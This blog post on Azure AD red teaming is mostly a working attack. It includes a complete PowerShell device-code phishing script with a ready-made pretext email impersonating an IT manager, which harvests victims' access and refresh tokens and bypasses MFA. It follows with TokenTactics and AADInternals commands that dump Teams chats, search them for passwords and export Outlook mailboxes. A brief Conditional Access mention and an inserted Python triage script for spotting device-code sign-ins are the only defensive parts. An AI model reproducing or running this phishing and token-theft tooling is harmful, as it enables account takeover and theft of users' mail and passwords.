Azure AD Penetration Test Initial Access Phase (Red Team on Azure AD)

Melih Turhanlar
3 min read · Apr 12, 2023

This will be short and to the point for Azure AD penetration testing and red teaming. There are several ways to phish users in Azure AD and obtain their tokens, and doing so even bypasses MFA: not only the Authenticator app but also YubiKey implementations.

Device Authentication Method


The basic idea of using device code authentication for phishing is the following.

  1. The attacker connects to the /devicecode endpoint and sends a client_id and resource.
  2. After receiving verification_uri and user_code, the attacker creates an email containing a link to verification_uri together with user_code, and sends it to the victim.
  3. The victim clicks the link, enters the code and completes the sign-in.
  4. The attacker receives access_token and refresh_token and can now act as the victim.
  5. Run the script below.

The script is taken from the o365blog post in the references.

$body=@{
    "client_id" = "d3590ed6-52b3-4102-aeff-aad2292ab01c"
    "resource" = "https://graph.windows.net"
}

# Request the device code and user code
$authResponse = Invoke-RestMethod -UseBasicParsing -Method Post -Uri "https://login.microsoftonline.com/common/oauth2/devicecode?api-version=1.0" -Body $body
$user_code = $authResponse.user_code

########################################################################
########################################################################
# The request above returned the device code and user code.
# Send the user code to the victim together with the https://microsoft.com/devicelogin link, e.g.:

# Hi,

# This is an urgent situation. Your device is affected by malware and we are taking some malicious logs
# from your device. So we have deleted your device from our Azure AD resources.
# By using the code: you need to reregister to https://microsoft.com/devicelogin and
# re-sign in to all applications again.

# Your IT manager

########################################################################
########################################################################
# The phishing email has been sent to the victim; now we go to the next step.

$continue = $true
$total = 0
$interval = $authResponse.interval
$expires = $authResponse.expires_in

# Create body for authentication requests
$body=@{
    "client_id" = "d3590ed6-52b3-4102-aeff-aad2292ab01c"
    "grant_type" = "urn:ietf:params:oauth:grant-type:device_code"
    "code" = $authResponse.device_code
    "resource" = "https://graph.windows.net"
}

# Loop while authorisation is pending or until the timeout is exceeded
while($continue)
{
    Start-Sleep -Seconds $interval
    $total += $interval

    if($total -gt $expires)
    {
        Write-Error "Timeout occurred"
        return
    }

    # Try to get the response. The endpoint returns 40x while pending, so we need try/catch
    try
    {
        $response = Invoke-RestMethod -UseBasicParsing -Method Post -Uri "https://login.microsoftonline.com/Common/oauth2/token?api-version=1.0" -Body $body -ErrorAction SilentlyContinue
    }
    catch
    {
        # This is the normal flow: always returns 40x unless successful
        $details = $_.ErrorDetails.Message | ConvertFrom-Json
        $continue = $details.error -eq "authorization_pending"
        Write-Host $details.error

        if(!$continue)
        {
            # Not pending, so this is a real error
            Write-Error $details.error_description
            return
        }
    }

    # If we got a response, all okay!
    if($response)
    {
        break # Exit the loop
    }
}


# Then start running these AADInternals commands to enumerate Azure AD with the token
Get-AADIntUsers -AccessToken $response.access_token | select displayname
Get-AADIntGlobalAdmins -AccessToken $response.access_token
Get-AADIntTenantID -AccessToken $response.access_token
Get-AADIntTenantDetails -AccessToken $response.access_token
Get-AADIntUserMFA -AccessToken $response.access_token

Limitations from the Attacker's Perspective

  • The victim must authenticate within 15 minutes.
  • The attacker signs in to the tenant, so the sign-in appears in its logs.

Preventing

  • Conditional Access (CA)
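As an added, defender-side example (not part of the original post, and not o365blog or TokenTactics code): a small Python triage script that runs over constructed Azure AD sign-in records, using Microsoft Graph signIn property names, and rates each device code sign-in, treating a successful one from an IP the user has never used on a normal sign-in as the most urgent and a Conditional Access block as informational. The records, user names and IPs are constructed; the Office client_id is the one used in the script above.

```python
import json
from collections import defaultdict

# client_id used by the device code script in this post (the Microsoft Office client)
OFFICE_CLIENT_ID = "d3590ed6-52b3-4102-aeff-aad2292ab01c"

# Constructed sample sign-in records; property names follow the Microsoft Graph signIn resource.
SAMPLE_SIGNINS = json.loads("""[
 {"createdDateTime": "2023-04-12T08:01:00Z", "userPrincipalName": "alice@example.test", "appId": "d3590ed6-52b3-4102-aeff-aad2292ab01c", "ipAddress": "203.0.113.10", "authenticationProtocol": "none", "conditionalAccessStatus": "success", "status": {"errorCode": 0}},
 {"createdDateTime": "2023-04-12T09:15:00Z", "userPrincipalName": "alice@example.test", "appId": "d3590ed6-52b3-4102-aeff-aad2292ab01c", "ipAddress": "198.51.100.77", "authenticationProtocol": "deviceCode", "conditionalAccessStatus": "notApplied", "status": {"errorCode": 0}},
 {"createdDateTime": "2023-04-12T08:30:00Z", "userPrincipalName": "bob@example.test", "appId": "d3590ed6-52b3-4102-aeff-aad2292ab01c", "ipAddress": "203.0.113.11", "authenticationProtocol": "none", "conditionalAccessStatus": "success", "status": {"errorCode": 0}},
 {"createdDateTime": "2023-04-12T09:20:00Z", "userPrincipalName": "bob@example.test", "appId": "d3590ed6-52b3-4102-aeff-aad2292ab01c", "ipAddress": "203.0.113.11", "authenticationProtocol": "deviceCode", "conditionalAccessStatus": "success", "status": {"errorCode": 0}},
 {"createdDateTime": "2023-04-12T09:30:00Z", "userPrincipalName": "carol@example.test", "appId": "d3590ed6-52b3-4102-aeff-aad2292ab01c", "ipAddress": "198.51.100.78", "authenticationProtocol": "deviceCode", "conditionalAccessStatus": "failure", "status": {"errorCode": 53003}}
]""")


def baseline_ips(signins):
    """Per-user set of IPs seen on sign-ins that did NOT use the device code flow."""
    seen = defaultdict(set)
    for s in signins:
        if s.get("authenticationProtocol") != "deviceCode":
            seen[s["userPrincipalName"]].add(s["ipAddress"])
    return seen


def triage_device_code(signins):
    """One finding per device code sign-in, in log order.
    high:   succeeded from an IP the user never used on a normal sign-in
    medium: succeeded from a known IP (confirm with the user; revoke sessions if unexpected)
    info:   failed, e.g. errorCode 53003 = blocked by Conditional Access"""
    seen = baseline_ips(signins)
    findings = []
    for s in signins:
        if s.get("authenticationProtocol") != "deviceCode":
            continue
        upn, ip = s["userPrincipalName"], s["ipAddress"]
        if s["status"]["errorCode"] != 0:
            severity = "info"
        elif ip not in seen[upn]:
            severity = "high"
        else:
            severity = "medium"
        findings.append({"user": upn, "ip": ip, "severity": severity,
                         "office_client": s["appId"] == OFFICE_CLIENT_ID,
                         "ca_applied": s["conditionalAccessStatus"] != "notApplied"})
    return findings


if __name__ == "__main__":
    for f in triage_device_code(SAMPLE_SIGNINS):
        print(f)
```

A device code sign-in with conditionalAccessStatus "notApplied" (alice above) also tells you no CA policy covered that flow, which is the gap the Preventing section is about.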

Azure AD Red Team First Action

After obtaining these tokens you can do more: you can exchange them for tokens for other services and read users' Microsoft Teams chats and Outlook messages. Unfortunately, ignoring security best practices, many users share passwords in Teams chats and Outlook messages, so search for passwords when red teaming.

Follow the first step above and, after obtaining the tokens, run these commands.


# Download TokenTactics from https://github.com/rvrsh3ll/TokenTactics
Import-Module .\TokenTactics.psd1

# It will give you the tokens that you will need.
Get-AzureToken -Client MSGraph

# Phish the user and get the user's tokens
RefreshTo-MSTeamsToken -domain "<domain.name>"

# After the user is phished, get all Teams messages
Get-AADIntTeamsMessages -AccessToken $MSTeamsToken.access_token

# Search for a password in Teams messages
Get-AADIntTeamsMessages -AccessToken $MSTeamsToken.access_token | Select-String -Pattern Password

Connect-AzureAD -AadAccessToken $response.access_token -AccountId "<email@domain.name>"
Get-AzureADUser

# This gives you the $MSGraphToken variable with the tokens inside
RefreshTo-MSGraphToken -domain "<domain.name>"

# Dump all emails using the $MSGraphToken returned by RefreshTo-MSGraphToken
Dump-OWAMailboxViaMSGraphApi -AccessToken $MSGraphToken.access_token -mailFolder inbox

# With this you can go and look via the browser.
RefreshTo-SubstrateToken -domain "<domain.name>"

# It prints a request; follow the instructions and use it in Burp and you will have
# the browser view.
Open-OWAMailboxInBrowser -AccessToken $SubstrateToken.access_token

Follow me on GitBook/GitHub.

References
